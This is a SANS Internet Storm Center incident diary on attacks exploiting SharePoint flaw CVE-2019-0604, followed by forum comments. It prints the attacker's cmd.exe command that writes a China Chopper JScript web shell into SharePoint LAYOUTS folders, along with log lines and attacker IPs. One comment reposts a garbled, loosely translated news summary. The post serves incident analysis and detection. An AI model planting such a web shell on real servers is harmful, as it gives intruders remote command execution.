Threat Level: green Handler on Duty: Jan Kopriva

SANS ISC: CVE-2019-0604 Attack - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
CVE-2019-0604 Attack

Over the past week, I started seeing attacks on Sharepoint servers using vulnerability CVE-2019-0604.  The Zero Day Initiative has a great write up(1) on the exploit of the vulnerability. 

Initial detection of the exploit came from endpoint exploit detection. When reviewing the IIS logs, we saw a post to the Picker.aspx. This appears to be the most common entry point for this attack exploiting CVE-2019-0604. 

Initial Log 
        2019-05-02 07:04:13 192.168.1.1 POST /_layouts/15/Picker.aspx - 443 - 121.147.96.8 python-requests/2.18.4 200 0 0 670

In the case of this attacker, they dropper a China Chopper payload on the server. China Chopper has been around for a long time. Crowdstrike did a great writeup(2) in 2015.  The payload for this is just a one-liner that was echoed into the files via command line. 

The anomaly that endpoint detected was a cmd shell spawning by w3wp.exe process. 

      Parent Process: w3wp.exe
      Process Name: cmd.exe

        "C:\Windows\System32\cmd.exe" /c echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> > "%CommonProgramFiles%\Microsoft Shared\Web Server             Extensions\14\TEMPLATE\LAYOUTS\t.aspx" & echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> > 
       "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\t.aspx" & echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> > 
        "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\t.aspx"

While the attack appears to be an automated drive-by, the attackers did not come back and do any additional modifications to the server.


IOC's 

Attackers IPS:
121[.]147[.]96[.]8    
211[.]222[.]223[.]14 
119[.]65[.]36[.]2 

User agent string:python-requests/2.18.4

Chopper Files created:
"%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\t.aspx"
"%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\t.aspx”
"%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\14\TEMPLATE\LAYOUTS\t.aspx”


(1)https://www.thezdi.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability
(2)https://www.crowdstrike.com/blog/chopping-packets-decoding-china-chopper-web-shell-traffic-over-ssl/

Thanks to my team for the analysis.

--

Tom Webb

@twsecblog

Tom

55 Posts
ISC Handler
Can we directly get MAC IPs of attackers.
Great analysis.

Also please attach pretty formatted logs. would help me.
bkdroid13

3 Posts
Let me cover the complete update here.

The hacker group attacked Microsoft SharePoint servers to exploit the newly fixed vulnerabilities and access corporate and government networks, according to a security advisor recently sent by Canadian security agents, Canada and Saudi Arabia Arabia.

Security breaches exploited in this attack are tracked as CVE-2019-0604, which has been corrected by Microsoft in security updates released in February, March, and April of this year.

"An attacker who successfully exploits a vulnerability can run arbitrary code in the context of the SharePoint application collection and the server account of the SharePoint farm," Microsoft said at the time.

The exploit code demonstration for CVE-2019-0604 was released in March by Markus Wulftange, a security researcher who discovered vulnerabilities, but other PoCs also appeared on GitHub and Pastebin.

The attack began shortly after the end of April. The Canadian Cyber ​​Security Center first issued a warning last month, and officials from the Saudi National Cybersecurity Center (NCSC) issued a second security warning this week.

The two cybersecurity agents reported seeing an attacker take control of a SharePoint server and create a web version of China Chopper, a type of malicious software installed on a server that allows hackers to connect to it. issue various commands.


via: [url=https://www.hows.tech/]https://www.hows.tech/[url]
bkdroid13

3 Posts

Sign Up for Free or Log In to start participating in the conversation!